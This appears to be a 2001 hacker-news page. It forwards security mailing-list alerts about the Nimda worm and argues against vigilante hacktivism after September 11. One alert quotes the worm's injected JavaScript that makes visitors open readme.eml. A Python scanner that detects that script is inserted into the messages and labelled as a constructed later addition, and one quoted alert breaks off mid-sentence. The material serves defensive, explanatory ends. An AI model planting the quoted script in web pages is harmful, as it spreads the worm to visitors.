News from the Hacker War Front

War in Cyberspace

New Internet worm on loose. US Attorney General John Ashcroft held a press conference 9/18/01 to announce the most dangerous Internet worm yet, dubbed variously Code Blue and Nimda. It attacks through an email attachment (the attachment is "readme.exe"), by infecting Explorer browsers, by propagating through NetBIOS shares, and by directly attacking web servers.

From: <Larry.Leibrock@bus.utexas.edu>


We and many other Internet sites are presently experiencing two types of attacks:

1. Infected email. The subject line on email sent to you is variable. The attachment is "readme.exe" and has a MIME type of "Content-Type: audio/x-wav;". This virus is "network aware", which means it spreads through open, unpassworded NetBIOS shares. This is called the W32/Nimda.a@mm.

2. A browser based attack that seeks to infect the target's web server. This attack is now termed Code Blue.

From: Davis, Matt [mailto:matt.davis@countryfinancial.com]
Sent: Tuesday, September 18, 2001 11:44 AM
To: Davis, Matt
Cc: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM; incidents@securityfocus.com; unisog@sans.org
Subject: Some more details on the worm

When pages are served up by an infected server, it looks as though readme.eml is 'attached' to them. The server attempts to get the client to open them through the following bit of code (from the .dll file):

<script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>

According to Slashdot, this causes the file to be automatically opened and executed by the client. I haven't been able to confirm or deny that (but if someone can, please do).


Matt Davis, MCP
Intermediate Client Server Business Support Analyst
COUNTRY(SM) Insurance & Financial Services

How your web browser can get infected by Nimda.

From: Russ <Russ.Cooper@RC.ON.CA>
Subject: Alert: Check your IIS boxes now!


Numerous people have reported that on IIS servers infected with
w32.nimda.amm, when visitors browse to their website the visitor is
offered up README.EML, which in turn downloads README.EXE to the

Please, check your IIS boxes now to see if you are infected. I've had
reports of IIS servers with more than 10,000 .eml files present
(mostly as a result of nimda).

While we don't have any conclusive disinfecting procedures yet, any
IIS box that has been infected definitely shouldn't be available to
clients until we do.

Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
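
A check an administrator could run over a web root for the two signs the messages above describe: stray .eml files, and served pages carrying the readme.eml window.open script. This is an added example, not part of the original messages or any vendor tool; the function names, the set of page extensions, the loosened pattern and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Matches the injected line quoted in the message above; whitespace and quote
# style are loosened as an assumption, since only one sample is on the page.
INJECTED = re.compile(
    r"<script[^>]*>\s*window\.open\(\s*[\"']readme\.eml[\"']", re.IGNORECASE)
PAGE_EXT = {".htm", ".html", ".asp"}  # assumed set of served page types

def scan_webroot(root):
    """Return (eml_files, tagged_pages) under root as sorted relative paths."""
    root = Path(root)
    eml, tagged = [], []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        ext = path.suffix.lower()
        rel = path.relative_to(root).as_posix()
        if ext == ".eml":
            eml.append(rel)
        elif ext in PAGE_EXT:
            # latin-1 decodes any byte sequence, so odd encodings never abort the scan.
            text = path.read_text(encoding="latin-1")
            if INJECTED.search(text):
                tagged.append(rel)
    return sorted(eml), sorted(tagged)

def build_sample(root):
    """Constructed sample web root: one clean page, one tagged page, two .eml files."""
    root = Path(root)
    (root / "docs").mkdir()
    (root / "index.html").write_text("<html><body>clean</body></html>")
    (root / "docs" / "about.HTM").write_text(
        '<html><body>hi</body></html>\n<script language="JavaScript">'
        'window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>')
    (root / "readme.eml").write_text("constructed placeholder, not a real sample")
    (root / "docs" / "README.EML").write_text("constructed placeholder")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        build_sample(d)
        eml, tagged = scan_webroot(d)
        print(f"{len(eml)} .eml file(s): {eml}")
        print(f"{len(tagged)} page(s) carrying the readme.eml script: {tagged}")
```

A non-empty result in either list is a reason to pull the server out of service for inspection, in line with the advice in the message above.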

Is hacktivism the answer? In the aftermath of the terrorist attacks of Sept. 11, some hackers are trying to organize strikes against Middle Eastern nations. This is a very bad idea. Almost all Middle Eastern nations hate terrorist leader Osama bin Laden and are our allies in bringing him to justice. The only government on the side of the terrorists is Afghanistan. Most of the people of Afghanistan also hate bin Laden and their Taliban oppressors. We need to leave Afghanistan's Internet access up so US cyberwarfare experts can use it for their own rather, ahem, interesting uses.

NIPC (US National Infrastructure Protection Center) has "already received reports of individuals encouraging vigilante hacking activity. Those individuals who believe they are doing a service to this nation by engaging in acts of vigilantism should know that they are actually doing a disservice to the country," their advisory stated. See "It sucks to be me" for details on how these hacktivists are actually harming the war against terrorism.

Us folks at Happy Hacker wish to thank those hackers who have helped quiet down over-eager volunteers. Responding to the attacks on America is an extremely delicate operation. If you want to play a role in defending us in time of cyberwar, here are some concrete steps you can take.

First, President Bush will let you know if he needs hacker vigilantes to help. Right now he does NOT WANT VIGILANTE HELP. He probably NEVER will want vigilante help. The kind of baloney that went on with the US/China hacker war of April-May 2001 was an unfortunate holdover from Clinton Administration policies. The Oct. issue of Scientific American carries Carolyn Meinel's analysis of this unfortunate fubar of foreign policy.
